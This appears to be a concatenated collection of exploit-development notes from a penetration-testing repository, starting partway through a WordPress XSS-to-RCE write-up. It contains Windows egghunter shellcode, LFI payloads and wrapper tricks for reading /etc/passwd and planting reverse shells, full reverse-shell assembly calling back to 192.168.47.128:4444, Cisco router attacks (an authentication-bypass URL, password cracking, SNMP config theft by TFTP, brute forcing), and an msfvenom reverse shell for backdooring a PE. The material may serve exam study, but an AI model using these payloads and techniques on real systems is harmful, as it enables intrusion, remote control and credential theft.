64 | 67 | 68 | 69 | 70 | 71 | he javascript function generates the value of the comment that the injected html will be. 72 | 73 | We perform the execution of the page by the victim with an open session and we see how the XSS would work. 74 | 75 | 76 | RCE 77 | 78 | RCE is obtained through access to a malicious page and a click on a link, 79 | but it is clear that this payload can be improved, 80 | for example by replacing the onclick with onmouseover and making javascript execution automatic without the need to click. 81 | 82 | 83 | 84 | Our goal is to achieve the execution of commands through javascript. 85 | In order to extract a valid code and test it we will use a WordPress of our control. 86 | In this case I will upload a comment to the WordPress as an administrator that will not perform any sanetization 87 | and then we will proceed to try to take it to the XSS. 88 | 89 | 90 | We will take advantage of the fact that the javascript will be executed by the victim who has the session started, 91 | so that through XMLHttpRequest requests to the plugin editor. 92 | 93 | To explain the code a bit: 94 | - I’ll say that you first make a request to get the nonce, which is a kind of CSRF Token 95 | - Then use that token to make the second request 96 | 97 | The next step is to obtain an XSS payload that allows us to load this JS. 98 | I am sure that many of you would get a more elegant payload but I am not an expert either, 99 | what I thought was to load a js of my control. 100 | 101 | 102 | he part that interests us in this case is the content of the onclick, 103 | since the tag structure is the same as before. 104 | In this case what we do is create a new element in the DOM that will be a script tag and we assign the 105 | src property pointing to a js of our control, 106 | to be able to introduce the strings I have converted by concatenating String.fromCharCode() with each ascii of each 107 | string used. 108 | 109 | Finally we introduce our payload in the malicious form of the page to which the victim must access 110 | -------------------------------------------------------------------------------- /Egghunter/Win32-Egghunter: -------------------------------------------------------------------------------- 1 | Heap-Only Egg Hunter: http://r00tin.blogspot.com/2009/03/heap-only-egg-hunter.html 2 | 3 | Win32 Egghunting 4 | 5 | You just have to remember : 6 | - The marker needs to be unique (Usually you need to define the tag as 4 bytes inside the egg hunter, and 2 times (2 times right after each other, so 8 bytes) prepended to the actual shellcode. 7 | - You’ll have to test which technique to search memory works for a particular exploit. (NTAccessCheckAndAuditAlarm seems to work best on my system) 8 | - Each technique requires a given number of available space to host the egg hunter code : 9 | o SEH technique uses about 60 bytes. 10 | o IsBadReadPtr requires 37 bytes 11 | o NtDisplayString method uses 32 bytes. (This last technique only works on NT derived versions of Windows. 12 | 13 | Windows Egghunters 14 | - SEH 15 | - IsBadReadPtr 16 | - NtDisplayString 17 | 18 | 19 | There are two distinct methods by which the address space of a given process can be searched on Windows. 20 | 1. Take Advantage of a feature that is unique to Windows: Structured Exception Handling. 21 | 2. Use the system call validation method that was also used on Linux. 22 | 23 | ---------------------------------------------------------------------------------------------------------------------------- 24 | ---------------------------------------------------------------------------------------------------------------------------- 25 | ---------------------------------------------------------------------------------------------------------------------------- 26 | ---------------------------------------------------------------------------------------------------------------------------- 27 | ---------------------------------------------------------------------------------------------------------------------------- 28 | ---------------------------------------------------------------------------------------------------------------------------- 29 | 30 | SEH: 31 | The following implementation, while rather large, is an example of an egg hunter that installs its own exception handler and fixes up the execution path properly when an invalid address is encountered. Before diving into the analysis, perhaps a little bit of information on the subject of exception handlers would make sense. 32 | To recap, Windows provides a mechanism by which process-relative exception handlers can be registered that can receive notifications regarding things like 33 | access violations, breakpoints, floating point exceptions, and other such runtime errors. These handlers can be chained together, thus allowing for one handler to pass along the exception further down the chain if it does not need to or is unable to deal with the type of exception that has been encountered. These exception handlers are analogous to the C++ and Java exception handlers that are used when class methods throw exceptions to callers in order to pass error information up the stack. 34 | 35 | my $egghunter = "\xeb\x21\x59\xb8". 36 | "w00t". 37 | "\x51\x6a\xff\x33\xdb\x64\x89\x23\x6a\x02\x59\x8b\xfb". 38 | "\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb". 39 | "\xed\xe8\xda\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1". 40 | "\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x33\xc0\xc3"; 41 | 42 | (where w00t is the tag. You could write w00t as “\x77\x30\x30\x74” as well) 43 | 44 | 45 | 46 | IsBadReadPtr: 47 | Second egghunter is smaller than the first. 48 | 49 | IsBadReadPtr function simply installs its own exception handler and then dereferences the provided pointer for the given number of bytes to see if it can be read from. 50 | If the pointer cannot be read from, TRUE is returned, otherwise FALSE is returned and the pointer can be assumed to be valid, at least at that point in execution. 51 | 52 | The implementation will use IsBadReadPtr as a means to validate eight bytes of contiguous memory, much like the other implementations use system calls or their own custom exception handlers. 53 | 54 | Egg hunter payload : 55 | my $egghunter = "\x33\xdb\x66\x81\xcb\xff\x0f\x43\x6a\x08". 56 | "\x53\xb8\x0d\x5b\xe7\x77\xff\xd0\x85\xc0\x75\xec\xb8". 57 | "w00t". 58 | "\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"; 59 | 60 | 61 | 62 | NtDisplayString 63 | The third egg hunter implementation is limited to NT derived versions of Windows, but the concepts should be applicable 9X based versions as well. 64 | 65 | The actual system call that was used to accomplish the egg hunting operation was the NtDisplayString system call. 66 | 67 | The NtDisplayString system call is typically used to display text to the bluescreen that some people are (unfortunately) all too familiar with. 68 | 69 | For the purposes of an egg hunter, however, it is abused due to the fact that its only argument is a pointer that is read from and not written to, thus making it a most desirable choice. The actual implementation varies little from the Linux implementations that use system calls (other than the obvious error code and system call number differences): 70 | 71 | 72 | Egg hunter payload : 73 | my $egghunter = 74 | "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8". 75 | "w00t". 76 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"; 77 | 78 | - the edx register is used as the register that holds the pointer that is to be validated throughout the course of the search operation. 79 | 80 | 81 | 82 | 83 | Egg hunter using NtAccessCheck (AndAuditAlarm) 84 | 85 | Another egg hunter that is very similar to the NtDisplayString hunter is this one : 86 | my $egghunter = 87 | "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8". 88 | "\x77\x30\x30\x74". # this is the marker/tag: w00t 89 | "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"; 90 | Instead of using NtDisplayString, it uses NtAccessCheckAndAuditAlarm (offset 0x02 in the KiServiceTable) to prevent access violations from taking over your egg hunter. More info about NtAccessCheck can be found here and here. Also, my friend Lincoln created a nice video about this egg hunter : 91 | 92 | -------------------------------------------------------------------------------- /WebExploitation/LFI/LFI-Testing-Techniques: -------------------------------------------------------------------------------- 1 | Source: https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf 2 | -------------------- 3 | 4 | Example of Vulnerable Code 5 | The following is an example of PHP code vulnerable to local file inclusion. 6 | 7 | 18 | -------------------- 19 | Identifying LFI Vulnerabilities within Web Applications 20 | LFI vulnerabilities are easy to identify and exploit. Any script that includes a file from a web 21 | server is a good candidate for further LFI testing, for example: 22 | 23 | /script.php?page=index.html 24 | 25 | A penetration tester would attempt to exploit this vulnerability by manipulating the file location 26 | parameter, such as: 27 | /script.php?page=../../../../../../../../etc/passwd 28 | -------------------- 29 | -------------------- 30 | -------------------- 31 | PHP Wrappers 32 | 33 | PHP has a number of wrappers that can often be abused to bypass various input filters. 34 | -------------------- 35 | PHP Expect Wrapper 36 | 37 | PHP expect:// allows execution of system commands, unfortunately the expect PHP module is 38 | not enabled by default. 39 | 40 | php?page=expect://ls 41 | --------------- 42 | 43 | PHP file:// Wrapper 44 | 45 | The payload is sent in a POST request to the server such as: 46 | 47 | /fi/?page=php://input&cmd=ls 48 | -------------------- 49 | 50 | PHP php://filter 51 | 52 | php://filter allows a pen tester to include local files and base64 encodes the output. Therefore, 53 | any base64 output will need to be decoded to reveal the contents. 54 | 55 | vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd 56 | 57 | 58 | php://filter can also be used without base64 encoding the output using: 59 | 60 | ?page=php://filter/resource=/etc/passwd 61 | -------------------- 62 | 63 | PHP ZIP Wrapper LFI 64 | 65 | The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload 66 | a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A 67 | typical attack example would look like 68 | 1. Create a PHP reverse shell 69 | 2. Compress to a .zip file 70 | 3. Upload the compressed shell payload to the server 71 | 4. Use the zip wrapper to extract the payload using: php?page=zip://path/to/file.zip%23shell 72 | 5. The above will extract the zip file to shell, if the server does not append .php rename it to shell.php instead 73 | 74 | If the file upload function does not allow zip files to be uploaded, attempts can be made to bypass 75 | the file upload function (see: OWASP file upload testing document). 76 | -------------------- 77 | 78 | LFI via /proc/self/environ 79 | 80 | If it’s possible to include /proc/self/environ via a local file inclusion vulnerability, then introducing 81 | source code via the User Agent header is a possible vector. Once code has been injected into the 82 | User Agent header a local file inclusion vulnerability can be leveraged to execute 83 | /proc/self/environ and reload the environment variables, executing your reverse shell. 84 | 85 | -------------------- 86 | -------------------- 87 | -------------------- 88 | Useful Shells 89 | 90 | Useful tiny PHP back doors for the above techniques: 91 | 92 | 93 | -------------------- 94 | Null Byte Technique 95 | 96 | Null byte injection bypasses application filtering within web applications by adding URL encoded 97 | “Null bytes” such as %00. Typically, this bypasses basic web application blacklist filters by adding 98 | additional null characters that are then allowed or not processed by the backend web application. 99 | 100 | vuln.php?page=/etc/passwd%00 101 | vuln.php?page=/etc/passwd%2500 102 | -------------------- 103 | Truncation LFI Bypass 104 | 105 | Truncation is another blacklist bypass technique. By injecting long parameter into the vulnerable 106 | file inclusion mechanism, the web application may “cut it off” (truncate) the input parameter, 107 | which may bypass the input filter. 108 | 109 | vuln.php?page=/etc/passwd……………………………………………………………………………. 110 | vuln.php?page=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 111 | vuln.php?page=/etc/passwd/../../../../../../../../../../../../../../../../../.. 112 | -------------------- 113 | -------------------- 114 | -------------------- 115 | Log File Contamination 116 | 117 | Log file contamination is the process of injecting source code into log files on the target system. 118 | This is achieved by introducing source code via other exposed services on the target system 119 | which the target operating system / service will store in log files. For example, injecting PHP 120 | reverse shell code into a URL, causing syslog to create an entry in the apache access log for a 121 | 404 page not found entry. The apache log file would then be parsed using a previously discovered 122 | file inclusion vulnerability, executing the injected PHP reverse shell. 123 | 124 | After introducing source code to the target systems log file(s) the next step is identifying the 125 | location of the log file. During the recon and discovery stage of penetration testing the web server 126 | and likely the target operating system would have been identified, a good starting point would be 127 | looking up the default log paths for the identified operating system and web server (if they are 128 | not already known by the consultant). FuzzDB’s Burp LFI payload lists can be used in conjunction 129 | with Burp intruder to quickly identify valid log file locations on the target system. 130 | -------------------- 131 | Apache / Nginx 132 | 133 | Inject code into the web server access or error logs using netcat, after successful injection parse 134 | the server log file location by exploiting the previously discovered LFI vulnerability. If the web 135 | server access / error logs are long, it may take some time execute your injected code. 136 | -------------------- 137 | Email a Reverse Shell 138 | 139 | If the target machine relays mail either directly or via another machine on the network and stores mail 140 | for the user www-data (or the apache user) on the system then it’s possible to email a reverse shell to the 141 | target. 142 | If no MX records exist for the domain but SMTP is exposed it’s possible to connect to the target 143 | mail server and send mail to the www-data / apache user. 144 | Mail is sent to the user running apache such as 145 | www-data to ensure file system permissions will allow read access the file /var/spool/mail/www-data 146 | containing the injected PHP reverse shell code 147 | 148 | 1) First enumerate the target system using a list of known UNIX / Linux account names. 149 | smtp-user-enum -M VRFY -U top_shortlist.txt -t 150 | 151 | 2) Then perform the process of sending email via telnet to the www-data user: 152 | telnet 25 153 | Send a reverse PHP shell via SMTP using telnet 154 | -------------------------------------------------------------------------------- /SmallReverseShell: -------------------------------------------------------------------------------- 1 | We can use https://github.com/h0mbre/CTP-OSCE/tree/master/TinyRev to update all of this 2 | 3 | 4 | We have a few required functions to normally get a reverse shell working in Windows. They are: 5 | 6 | LoadLibraryA - this is used to load the winsock DLL ws2_32.dll 7 | WSAStartup - this intializes the use of the winsock DLL in the process, has to be done before any sockets can be created. 8 | WSASocketA - this is used to create the socket. 9 | connect - this uses the created socket and establishes a connection. 10 | CreateProcessA - this is used to create a cmd process and redirect stdin, stdout, and stderr 11 | ExitProcess - fairly obvious what this does. However you really don’t need this. 12 | 13 | 14 | 15 | Our target process will have already loaded the winsock DLL and also initialized it, due to the fact that it’s using sockets and binding to a port to provide its functions. 16 | 17 | This means we only need to concern ourselves with WSASocketA, connect, and CreateProcessA. 18 | We’ll need to get the addresses where these functions live to get started. 19 | - CreateProcessA lives in kernel32.dll 20 | - WSASocketA 21 | - connect live in the ws2_32.dll (winsock). 22 | 23 | To grab these addresses we’ll use arwin on our Windows 10 box. 24 | PS C:\Users\admin\Desktop\arwin> .\arwin.exe kernel32 CreateProcessA 25 | arwin - win32 address resolution program - by steve hanna - v.01 26 | CreateProcessA is located at 0x74f36630 in kernel32 27 | 28 | PS C:\Users\admin\Desktop\arwin> .\arwin.exe ws2_32 WSASocketA 29 | arwin - win32 address resolution program - by steve hanna - v.01 30 | WSASocketA is located at 0x754e9730 in ws2_32 31 | 32 | PS C:\Users\admin\Desktop\arwin> .\arwin.exe ws2_32 connect 33 | arwin - win32 address resolution program - by steve hanna - v.01 34 | connect is located at 0x754e5ee0 in ws2_32 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | Now to write assembly: 43 | 44 | - First up is WSASocketA. If we reference Microsoft’s documentation here we can see that WSASocketA has a syntax as follows. 45 | WINSOCK_API_LINKAGE SOCKET WSAAPI WSASocketA( 46 | int af, 47 | int type, 48 | int protocol, 49 | LPWSAPROTOCOL_INFOA lpProtocolInfo, 50 | GROUP g, 51 | DWORD dwFlags 52 | ); 53 | 54 | Here is what is should look like with the correct parameters filled in. 55 | WINSOCK_API_LINKAGE SOCKET WSAAPI WSASocketA( 56 | int af - 2, AF_INET (IPv4) 57 | int type - 1, SOCK_STREAM (TCP) 58 | int protocol - 6, IPPROTO_TCP (TCP) 59 | LPWSAPROTOCOL_INFOA lpProtocolInfo - NULL, 60 | GROUP g - 0, No group operation 61 | DWORD dwFlags - 0 No flags 62 | ); 63 | 64 | We’ll need to push these values in reverse to the stack, and then MOV the address of WSASocketA into a register and CALL it. Finally we’ll need to stow away our created socket (which will be returned into EAX) in another register for later use. 65 | xor eax, eax ; clear EAX 66 | push eax ; dwFlags - 0 67 | push eax ; Group - 0 68 | push eax ; ProtocolInfo - NULL 69 | xor ebx, ebx ; clear EBX 70 | mov bl, 6 71 | push ebx ; Protocol - IPPROTO_TCP = 6 72 | inc eax 73 | push eax ; Type - SOCK_STREAM = 1 74 | inc eax 75 | push eax ; Family - AF_INET = 2 76 | mov ebx, 0x754e9730 ; WSASocketA - Win10 1803 77 | xor eax, eax 78 | call ebx 79 | xchg eax, esi ; save socket into ESI 80 | 81 | Next up is connect. Once again we’ll reference Microsoft’s documentation here. 82 | The structure for calling connect is as follows: 83 | 84 | 85 | 86 | Again we’ll be push our parameters in reverse, starting with creating a pointer to our our IP address and port. 87 | 88 | To figure out the address in hex you can simply break each octect down, reverse the order of the octects and convert to hex. ie: 89 | Example: 90 | 192.168.47.128 91 | 92 | 128 = 80, 47 = 2f, 168 = a8, 192 = c0. Thus we’ll push 802fa8c0. 93 | 94 | Same concept for the port. 4444 = 115c, reverse to 5c11. 95 | 96 | push 0x802fa8c0 ; 192.168.47.128 97 | push word 0x5c11 ; port 4444 98 | xor ebx, ebx 99 | add bl, 2 100 | push word bx 101 | mov edx, esp ; pointer for SockAddr 102 | push byte 16 ; AddrLen - 16 103 | push edx ; pSockAddr 104 | push esi ; saved socket 105 | mov ebx, 0x754e5ee0 ; connect - Win10 1803 106 | call ebx 107 | 108 | Finally is CreateProcessA, and boy is it a doozy. Let’s see what Microsoft has to say about it’s structure. 109 | 110 | 111 | 112 | Along with this we also need to provide a pointer for StartupInfo which it’s structure is defined here. 113 | So as you can see we have our work cut out for us here. Luckily a lot of these values are NULL for our purposes. Here’s what CreateProcessA should look like. 114 | 115 | Let’s go ahead and setup our pointer to “cmd” 116 | mov edx, 0x646d6363 ; cmdd 117 | shr edx, 8 ; cmd 118 | push edx 119 | mov ecx, esp ; pointer to "cmd" 120 | We also need a pointer for ProcessInformation, however we can literally just point this to garbage on the stack. 121 | xor edx, edx 122 | sub esp, 16 123 | mov ebx, esp ; pointer for ProcessInfo (points to garbage) 124 | Now we’ll need to create the ridiculous StartUpInfo pointer to reflect the following: 125 | 126 | push esi ; hStdError - saved socket 127 | push esi ; hStdOutput - saved socket 128 | push esi ; hStdInput -saved socket 129 | push edx ; pReserved2 - NULL 130 | push edx ; cbReserved2 -NULL 131 | xor eax, eax 132 | inc eax 133 | rol eax, 8 134 | push eax ; dwFlags - STARTF_USESTDHANDLES 0x00000100 135 | push edx ; dwFillAttribute - NULL 136 | push edx ; dwYCountChars - NULL 137 | push edx ; dwXCountChars - NULL 138 | push edx ; dwYSize - NULL 139 | push edx ; dwXSize - NULL 140 | push edx ; dwY - NULL 141 | push edx ; dwX - NULL 142 | push edx ; pTitle - NULL 143 | push edx ; pDesktop - NULL 144 | push edx ; pReserved - NULL 145 | xor eax, eax 146 | add al, 44 147 | push eax ; cb - size of structure 148 | mov eax, esp ; pStartupInfo 149 | 150 | Now we are finally ready to call CreateProcessA. 151 | push ebx ; pProcessInfo 152 | push eax ; pStartupInfo 153 | push edx ; CurrentDirectory - NULL 154 | push edx ; pEnvironment - NULL 155 | push edx ; CreationFlags - 0 156 | xor eax, eax 157 | inc eax 158 | push eax ; InheritHandles -TRUE - 1 159 | push edx ; pThreadAttributes -NULL 160 | push edx ; pProcessAttributes - NULL 161 | push ecx ; pCommandLine - pointer to "cmd" 162 | push edx ; ApplicationName – NULL 163 | mov ebx, 0x74f36630 ; CreateProcessA - Win10 1803 164 | call ebx 165 | 166 | Final Assembly Code 167 | global _start 168 | 169 | section .text 170 | 171 | _start: 172 | 173 | ; Create the socket with WSASocketA() 174 | 175 | xor eax, eax 176 | push eax ; Flags - 0 177 | push eax ; Group - 0 178 | push eax ; pWSAprotocol - NULL 179 | xor ebx, ebx 180 | mov bl, 6 181 | push ebx ; Protocol - IPPROTO_TCP = 6 182 | inc eax 183 | push eax ; Type - SOCK_STREAM = 1 184 | inc eax 185 | push eax ; Family - AF_INET = 2 186 | mov ebx, 0x754e9730 ; WSASocketA - Win10 1803 187 | xor eax, eax 188 | call ebx 189 | xchg eax, esi ; save socket into ESI 190 | 191 | ; connect() to attacking machine 192 | 193 | push 0x802fa8c0 ; 192.168.47.128 194 | push word 0x5c11 ; port 4444 195 | xor ebx, ebx 196 | add bl, 2 197 | push word bx 198 | mov edx, esp ; pointer for SockAddr 199 | push byte 16 ; AddrLen - 16 200 | push edx ; pSockAddr 201 | push esi ; saved socket 202 | mov ebx, 0x754e5ee0 ; connect - Win10 1803 203 | call ebx 204 | 205 | ; CreateProcessA() 206 | 207 | mov edx, 0x646d6363 ; cmdd 208 | shr edx, 8 ; cmd 209 | push edx 210 | mov ecx, esp ; pointer to "cmd" 211 | 212 | xor edx, edx 213 | sub esp, 16 214 | mov ebx, esp ; pointer for ProcessInfo (points to garbage) 215 | 216 | push esi ; hStdError - saved socket 217 | push esi ; hStdOutput - saved socket 218 | push esi ; hStdInput -saved socket 219 | push edx ; pReserved2 - NULL 220 | push edx ; cbReserved2 -NULL 221 | xor eax, eax 222 | inc eax 223 | rol eax, 8 224 | push eax ; dwFlags - STARTF_USESTDHANDLES 0x00000100 225 | push edx ; dwFillAttribute - NULL 226 | push edx ; dwYCountChars - NULL 227 | push edx ; dwXCountChars - NULL 228 | push edx ; dwYSize - NULL 229 | push edx ; dwXSize - NULL 230 | push edx ; dwY - NULL 231 | push edx ; dwX - NULL 232 | push edx ; pTitle - NULL 233 | push edx ; pDesktop - NULL 234 | push edx ; pReserved - NULL 235 | xor eax, eax 236 | add al, 44 237 | push eax ; cb - size of structure 238 | mov eax, esp ; pStartupInfo 239 | 240 | push ebx ; pProcessInfo 241 | push eax ; pStartupInfo 242 | push edx ; CurrentDirectory - NULL 243 | push edx ; pEnvironment - NULL 244 | push edx ; CreationFlags - 0 245 | xor eax, eax 246 | inc eax 247 | push eax ; InheritHandles -TRUE - 1 248 | push edx ; pThreadAttributes -NULL 249 | push edx ; pProcessAttributes - NULL 250 | push ecx ; pCommandLine - pointer to "cmd" 251 | push edx ; ApplicationName - NULL 252 | 253 | mov ebx, 0x74f36630 ; CreateProcessA - Win10 1803 254 | call ebx 255 | 256 | No we’ll compile with nasm and extract our shellcode out. 257 | root@kali:~# nasm -f elf32 -o revshell.o revshell.nasm 258 | root@kali:~# ld -o revshell revshell.o 259 | 260 | root@kali:~# for i in $(objdump -d win10revshell |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo 261 | \x31\xc0\x50\x50\x50\x31\xdb\xb3\x06\x53\x40\x50\x40\x50\xbb\x30\x97\x4e\x75\x31\xc0\xff\xd3\x96\x68\ 262 | 263 | -------------------------------------------------------------------------------- /Exploiting-Cisco-Routers/Part-1: -------------------------------------------------------------------------------- 1 | Source: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=1a827b4b-931a-4643-932c-e2765039aa58&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments 2 | 3 | Full control of the routing device can often lead to full control of the network - 4 | either by using credentials learned from the router on other network devices and systems, 5 | or by acting more deviously and diverting some traffic through a third-party system on its way to the intended destination. 6 | 7 | --------------------------- 8 | --------------------------- 9 | --------------------------- 10 | Identifying a Router 11 | 12 | Routers can be configured to look just like any other system on the network - 13 | they can run a web server, an SSH daemon, chargen, and they can even appear to be running multiple X servers. 14 | For this reason, they can may often be mistaken as Unix systems. 15 | 16 | 17 | Easiest and most accurate way of identifying a host on the network as a router is by using Nmap: 18 | 19 | A port scan of a typical Cisco router might look like this: 20 | Interesting ports on router1: 21 | (The 168 ports scanned but not shown below are in state: closed) 22 | Port State Service 23 | 7/tcp open echo 24 | 9/tcp open discard 25 | 13/tcp open daytime 26 | 19/tcp open chargen 27 | 23/tcp open telnet 28 | 79/tcp open finger 29 | 2001/tcp open dc 30 | 4001/tcp open unknown 31 | 6001/tcp open X11:1 32 | 9001/tcp open unknown 33 | Remote operating system guess: Cisco Router/Switch with IOS 11.2 34 | 35 | If a login service such as telnet or SSH is accessible, 36 | one can simply use a standard telnet client and connect to the appropriate port. 37 | 38 | A basic Cisco router might look like the following: 39 | telnet router1 Trying router1... Connected to router1. Escape character is '^]'. User Access Verification Password: 40 | 41 | The "User Access Verification" line is a trademark Cisco telnet banner. 42 | Of course one can't rely on banners alone, since system administrators sometimes modify them for deceptive reasons. 43 | 44 | 45 | SING is a tool that one can use to assemble custom ICMP packets, to include ICMP netmask requests (ICMP type 17). 46 | In my experience, routers are typically the only devices that reply to this type of ICMP packet. 47 | Sending this type (and others) of ICMP packet may also help to positively identify a system as a router. 48 | https://freshmeat.net/redir/sing/9570/url_tgz/SING-current.tar.gz 49 | 50 | Using traceroute to find the organization's border router is also quite easy. 51 | Once the target site's Internet accessible systems have been identified, 52 | one can traceroute to those systems to learn the pathway to them. T 53 | ypically the last hop before an Internet accessible system is the organization's border router. 54 | 55 | Other methods exist, but typically a Telnet client or NetCat is all one needs to connect and verify the device is a router. 56 | 57 | --------------------------- 58 | --------------------------- 59 | --------------------------- 60 | Identifying Vulnerabilities 61 | 62 | A vuln scanner can have a list of about 44 community strings to brute-force the SNMP daemon, 63 | which maybe enough to catch the usage of common default community strings such as public, and private, 64 | but of course can't take into account site-specific strings that might be in use. 65 | 66 | --------------------------- 67 | --------------------------- 68 | --------------------------- 69 | Exploiting Vulnerabilities in Cisco IOS 70 | 71 | A vulnerability that affects most Cisco routers (when conditions are right) 72 | is the HTTP Configuration Arbitrary Administrative Access Vulnerability. 73 | 74 | 1) fire up web browser and point it to the vulnerable router. 75 | A pop up will ask for your user name and password. 76 | 77 | 2) After clicking the "Cancel" button, 78 | the pen tester enters the following URL into the address bar. http://10.0.1.252/level/99/exec/show/config 79 | and is presented with the startup configuration of the device. 80 | 81 | Clearly visible in the web browser is the configuration of the target router. 82 | 83 | In it, we see exactly how the router is configured, 84 | other interfaces, 85 | the Access Control Lists (ACLS) if any, 86 | the SNMP community strings, 87 | and the easily decrypted passwords! 88 | 89 | Of the three different methods in IOS of storing the password, 90 | the network administrator has chosen Vigenere - 91 | an easily reversed encryption scheme. 92 | In this case, I fire up the freely available tool GetPass from Boson and instantly reverse the hash into plain text. 93 | 94 | Once the password is cracked, the pen tester logs in via telnet and gains complete administrative control on the router. 95 | 96 | As mentioned, there are three methods IOS can use to represent a password in a router config file. They are: 97 | Clear Text. ----------------- enable password password 98 | Vigenere ----------------- enable password 7 104B0718071B17 99 | MD5 ----------------- enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0 100 | 101 | It should be obvious that the most secure option is the one-way hash MD5, which by its very nature, cannot be reversed. 102 | It's implemented using the command, "enable secret 0 password". 103 | 104 | 105 | --------------------------- 106 | --------------------------- 107 | --------------------------- 108 | Exploiting Configuration Errors 109 | 110 | Brute-Forcing Services: SNMP is Always Fun 111 | 112 | A basic port scan may reveal that UDP port 161 (SNMP) is open and accessible. 113 | If the SNMP community strings are dictionary words, the pen tester is in luck. 114 | 115 | You can use free SNMP audit scanner ADMsnmp --> http://www.freshports.org/security/ADMsnmp/ 116 | ADMsnmp is a console-based application that will mow through a wordlist pretty quickly, 117 | letting you know of any community strings it guesses 118 | 119 | When determining the wordlist to use, 120 | I typically surf the target website and attempt to learn as much about the target as possible. 121 | I then take a bunch of acronyms, names, and departments, and try those words. 122 | 123 | Linux ships with a wordfile (/usr/share/dict/words) that contains 45427 words. 124 | 125 | 126 | The "send setrequest" string lets the user know that he has gained Read/Write privileges on the device. 127 | 128 | The first thing I usually do after gaining this level of access is to briefly walk to MIB (Management Information Base) 129 | to learn more about the device. 130 | (in this example: recv snmpd paket id = 140 name = duckling ret = 0 <<<<<<<<<< ) 131 | 132 | snmpwalk -v 1 -c duckling 10.0.1.252 | head SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System Software IOS (tm) 2500 Software (C2500-I-L), Version 12.0(14), RELEASE SOFTWARE (fc1) Copyright (c) 1986-2000 by cisco Systems, Inc. Compiled Tue 31-Oct-00 23:59 by linda SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.9.1.30 SNMPv2-MIB::sysUpTime.0 = Timeticks: (103607424) 11 days, 23:47:54.24 SNMPv2-MIB::sysContact.0 = STRING: SNMPv2-MIB::sysName.0 = STRING: ADMsnmp SNMPv2-MIB::sysLocation.0 = STRING: SNMPv2-MIB::sysServices.0 = INTEGER: 6 133 | 134 | Once I learn the device is a router, and running Cisco's IOS, 135 | I will then have the router send its config file to one of my systems using TFTP. 136 | I do this with the following command: 137 | 138 | snmpset 10.0.1.252 duckling .1.3.6.1.4.1.9.2.1.55.192.168.1.15 s "config" enterprises.9.2.1.55.192.168.1.15 = "config" 139 | 140 | I'll then check my tftpboot directory, and sure enough, the router's config file is now on my system. 141 | 142 | --------------------------- 143 | --------------------------- 144 | --------------------------- 145 | Brute-Forcing Login Services 146 | 147 | Brute-forcing login services such as Telnet and SSH. 148 | 149 | One of the first things to do before conducting this type of attack on the router is to determine whether 150 | or not the router is using some type of extended authentication like Tacacs or Radius. 151 | 152 | hough IOS doesn't have any means of natively locking out users after X number of login attempts, 153 | lockouts can be enabled when authentication is passed off to another system via Tacacs or Radius. 154 | 155 | The easiest way to tell if authentication is being passed to another system is to simply connect to the router 156 | using a standard Telnet client. 157 | 158 | [root@hackyou root]# telnet router2 159 | Trying router2... Connected to router2. Escape character is '^]'. User Access Verification Username: 160 | 161 | 162 | If the device prompts for a username, you can almost be sure that it is using some form of extended authentication. 163 | 164 | In this case, Tacacs is implemented and brute-forcing is going to be more difficult, 165 | because the pen tester will have to guess two variables, both the username and password instead of just the password. 166 | 167 | 168 | If finger is running, usernames can be gathered, but the chances of locking out a legitimate user account will 169 | likely stop most pen testers from conducting this sort of an attack. 170 | 171 | If it is determined that extended authorization is not in use, 172 | then the pen tester can brute-force the Telnet daemon in much the same way he did with SNMP. 173 | - Windows brute-force tool: Brutus 174 | - THC's Hydra is also good, unix-based tool. 175 | 176 | -------------------------------------------------------------------------------- /backdoorPE/ALR-Bypass Backdoor PE: -------------------------------------------------------------------------------- 1 | HIJACK TO CODE CAVE: 2 | 3 | If we check the location of our Code Cave, for this current execution of the program we can see that is in this memory address: 4 | 5 | Code Cave - 0x013BA000 6 | And that our entry point for our program is the following: 7 | 8 | Entry Point of the Program - 0x011DF62A 9 | 10 | How we can do a relative jump? The answer is using Nasm. 11 | 12 | We are going to do a jump to the Code Cave – Entry Point. We can do it like this: 13 | 14 | root@kali:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 15 | nasm > JMP (0x013BA000-0x011DF62A) 16 | 00000000 E9D1A91D00 jmp 0x1da9d6 17 | 18 | 19 | So the correct opcodes are: 20 | 21 | "\xE9\xD1\xA9\x1D\x00" 22 | We do a binary copy to copy them into the debugger and save them. 23 | The Jump is going to work although the program has ASLR protection. Because is a “relative” jump. 24 | 25 | 26 | ----------- 27 | pushad # Save registers into the stack 28 | pushfd # Save flags into the stack 29 | 30 | ------- 31 | Step 3. Creating and modifying the shellcode 32 | 33 | root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.88 LPORT=443 -f hex EXITFUNC=none 34 | 35 | Solving problem 1 – WaitForSingleObject Infinite 36 | The shellcode is going to do the following: 37 | 38 | DEC ESI ; Current value is 0, so it will convert in -1 39 | PUSH ESI; 40 | INC ESI; 41 | 42 | We are pushing a -1 to the the stack, and this is the parameter 43 | that is going to hang the code execution until shell ends, we need to change it for a zero. 44 | So we just can change DEC ESI for a NOP. 45 | 46 | Solving problem 2 – Avoiding ExitProcess 47 | 48 | 49 | ← Exploit 